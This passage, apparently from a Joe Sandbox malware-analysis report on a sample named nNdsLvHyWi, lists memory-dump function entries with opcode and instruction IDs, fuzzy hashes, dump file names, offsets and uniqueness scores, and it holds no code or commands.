                                          • Instruction ID: b1784bdd9f5db41675cffc21aca767e5f92cbf30fdc5ca56f4819d4adcdd5ad6
                                          • Opcode Fuzzy Hash: f8142405fb3733879dd50f44bdefcfcd67af5acd01a2e8d804884ae68902f294
                                          • Instruction Fuzzy Hash: 37216971E012169FEB40DF69E840AEEBBF5BB88710F118426E905FB340EB35D9018BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68c4de80338927a6da4171d61c7e938b2bb91198e6234735cca22384202d48e6
                                          • Instruction ID: a7cee708adeac16b3505cf7cc5e321daadcfc45f4b484b65dc30ec7b8144c026
                                          • Opcode Fuzzy Hash: 68c4de80338927a6da4171d61c7e938b2bb91198e6234735cca22384202d48e6
                                          • Instruction Fuzzy Hash: DC213975E012169FEB50DF69D880AEEBBF5BB88710F118426E905FB350E735D940CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4528702396.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_d9d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8d9d2b2d74e0c743fe205fc256cbd761753b22af7ac682f2f08d04f7b94a3fd
                                          • Instruction ID: 0f6377eb01b99727d0a563cb0c515614313cca9ae92741dee8de26b0cbd2a867
                                          • Opcode Fuzzy Hash: d8d9d2b2d74e0c743fe205fc256cbd761753b22af7ac682f2f08d04f7b94a3fd
                                          • Instruction Fuzzy Hash: E421CF76604204AFDF14DF24D980B26BB66EB84314F24C569E94D4B292C77AD846CA71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89939ac49a8d19a912334842409663c403b87a845dd437464fff28dbaff6034f
                                          • Instruction ID: 97a1098cec35c97fb20eca4d7954ae8d731765b5aab58534caab9cf8a5c2f37e
                                          • Opcode Fuzzy Hash: 89939ac49a8d19a912334842409663c403b87a845dd437464fff28dbaff6034f
                                          • Instruction Fuzzy Hash: 7911A131B001298FDB54DA78DC146EF73E6ABC9711B014939D506EB388EF65DC028BD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c6b1122d36f2ff3c1c515a770c1eb4bd1d096538f42b705e7e66f8e60ed9a44
                                          • Instruction ID: e8222fc3eb0bf47a47213c9c8b4f0e9643e8454edd1324ddbfd632a7ddf6a076
                                          • Opcode Fuzzy Hash: 1c6b1122d36f2ff3c1c515a770c1eb4bd1d096538f42b705e7e66f8e60ed9a44
                                          • Instruction Fuzzy Hash: DB01F535B041610FEB21D6BC881076BB7D7DBC6610F14886AE60DCB78AD955CD0247A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8165a957937ba35ff738d3a1a1d4d8625747d914431fc44441bb89e6d07283c1
                                          • Instruction ID: cc7abb53ca11421a7f10f9634ab5c615dc0ab341abce342b30951c7f15335a0f
                                          • Opcode Fuzzy Hash: 8165a957937ba35ff738d3a1a1d4d8625747d914431fc44441bb89e6d07283c1
                                          • Instruction Fuzzy Hash: F001F138B005815FDB25EA7CAC80B6FB7DAEBCA610B148869E60ACB245D925DC0247A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a72921745a5f7722b8a0f1accd92444e50f0c2c66284e7ea62bf7483ae617d6e
                                          • Instruction ID: 471dad31f8e610db656c703df73530a4567a29379f9f127dca946b6fb07d12ca
                                          • Opcode Fuzzy Hash: a72921745a5f7722b8a0f1accd92444e50f0c2c66284e7ea62bf7483ae617d6e
                                          • Instruction Fuzzy Hash: 2821F4B1C01259AFDB00CF9AD884ADEFBB4FF48710F10811AE918B7200C774A554CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1cad9abc3a2c45d0a061d6569925a83f4215bad963ed2628e3cfb8df209b2798
                                          • Instruction ID: fdcd2d77c3c7a7b5011feadf70c59057a611578f8915ece1b8697324dfbb5b5b
                                          • Opcode Fuzzy Hash: 1cad9abc3a2c45d0a061d6569925a83f4215bad963ed2628e3cfb8df209b2798
                                          • Instruction Fuzzy Hash: 5C01F730B042515FD751E67CE850B6F77D6EBC6720F108469F10ECB782EA25DD058790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4528702396.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_d9d000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction ID: 53f76ba127fb004396f272e072dc210143250464d9cf19d2a74f7f7db44f37fc
                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction Fuzzy Hash: EC119D76504284DFCB15CF14D9C4B15BFA2FB84318F28C6A9D8494B656C33AD84ACF62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 769a9067362b69c517b5e8c0686c7f65b7da5ae3fc9845016b02e6c5dc1a3298
                                          • Instruction ID: 4a79b6cb80e062bbc371746b56f164f0a5f1d83591ce2806a03419304a9a033e
                                          • Opcode Fuzzy Hash: 769a9067362b69c517b5e8c0686c7f65b7da5ae3fc9845016b02e6c5dc1a3298
                                          • Instruction Fuzzy Hash: 6B01D431B001195BDB549968DC107EF77EAABC9610F004439D506EB385DE61CC068BE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 64dded38652e108cd66fd8e96f2aa316524fbd634554b4c0256548e88741ef1f
                                          • Instruction ID: 29565a8664b260cc12fa2b7cd39372a4065e313bb66ffd534b79e7c901b01f8a
                                          • Opcode Fuzzy Hash: 64dded38652e108cd66fd8e96f2aa316524fbd634554b4c0256548e88741ef1f
                                          • Instruction Fuzzy Hash: 3D11CFB1D01259AFCB00DF9AD884ACEFBB4FF48720F10812AE918B7240D774A954CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80307d5367e37f1dfad1ff72a3189d38fa767102f84fc6e14331d51f42e986d4
                                          • Instruction ID: c6c617c808d1b1c6612ca2f8f8aad4acad02215caa68aefda2f82f191c0a9bf8
                                          • Opcode Fuzzy Hash: 80307d5367e37f1dfad1ff72a3189d38fa767102f84fc6e14331d51f42e986d4
                                          • Instruction Fuzzy Hash: 7D016235B000215BDB64A6AD981076FB3DAEBC5610F108839E60ED778ADD65DD024791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f51e3f07d863e4776925261e308c97fed4422e880a2beb8d3c882e02701cdefe
                                          • Instruction ID: 7cfafadf7ac666822adb460f9e1d357dcac7a36d00423f298aad444883ec9863
                                          • Opcode Fuzzy Hash: f51e3f07d863e4776925261e308c97fed4422e880a2beb8d3c882e02701cdefe
                                          • Instruction Fuzzy Hash: F201A439B004524BDB64E9BC9C50B6FB3D6EBC9B20F108839E60ECB344ED25DC024791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa69aa032df9d12a1c0515af04452b175383fa3b16ab3e696e0372606e9fee30
                                          • Instruction ID: ebf317f4ecbb77a62e6b1e7ed7616aad0561dad0ed0a5cc633c547e95831f6db
                                          • Opcode Fuzzy Hash: aa69aa032df9d12a1c0515af04452b175383fa3b16ab3e696e0372606e9fee30
                                          • Instruction Fuzzy Hash: 84018134B101115FDB54EA7CE850B6E73D6EBC5625F208828E10EDB784EA26DC018B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ae27aec3b641eab7ccba6ca90514333b63d448dfa56426a05be0f4f77ec8c28a
                                          • Instruction ID: df4cc3a7b927ddf7f6c1369b60f27c5f7e49302fef538ae73ea54088cbae2f02
                                          • Opcode Fuzzy Hash: ae27aec3b641eab7ccba6ca90514333b63d448dfa56426a05be0f4f77ec8c28a
                                          • Instruction Fuzzy Hash: BAF0A032E202289BDB24A9A6EC009DAB73AF784350F004469ED11EB284DA71A801CFD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 015c36d806683df7fecafebeaf403875b65a30e1e122a197901c2d30cd12f6b8
                                          • Instruction ID: 7b95a58d99478738c9e0965bc0721504b44f77814664d39d0dedbf57194c9d05
                                          • Opcode Fuzzy Hash: 015c36d806683df7fecafebeaf403875b65a30e1e122a197901c2d30cd12f6b8
                                          • Instruction Fuzzy Hash: FFF08C35E04116CFEF689E40ED406ECB7B8FB41312F2A3862C802E7160C371DA86DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ea47b0ca29f37f5505461caff6e4f71d8e4e5899303e7b3a265508de7c45e17
                                          • Instruction ID: 74d93822050f8a1b1ad85cdd18bb25a890dc44b7f627a0b374e39d0d7edd5148
                                          • Opcode Fuzzy Hash: 7ea47b0ca29f37f5505461caff6e4f71d8e4e5899303e7b3a265508de7c45e17
                                          • Instruction Fuzzy Hash: C1E06830E0824C6BDB10CA70CD5678B3BACF702204F1088F6D004D7242E13ACE008B40
                                          Uniqueness

                                          Uniqueness Score: -1.00%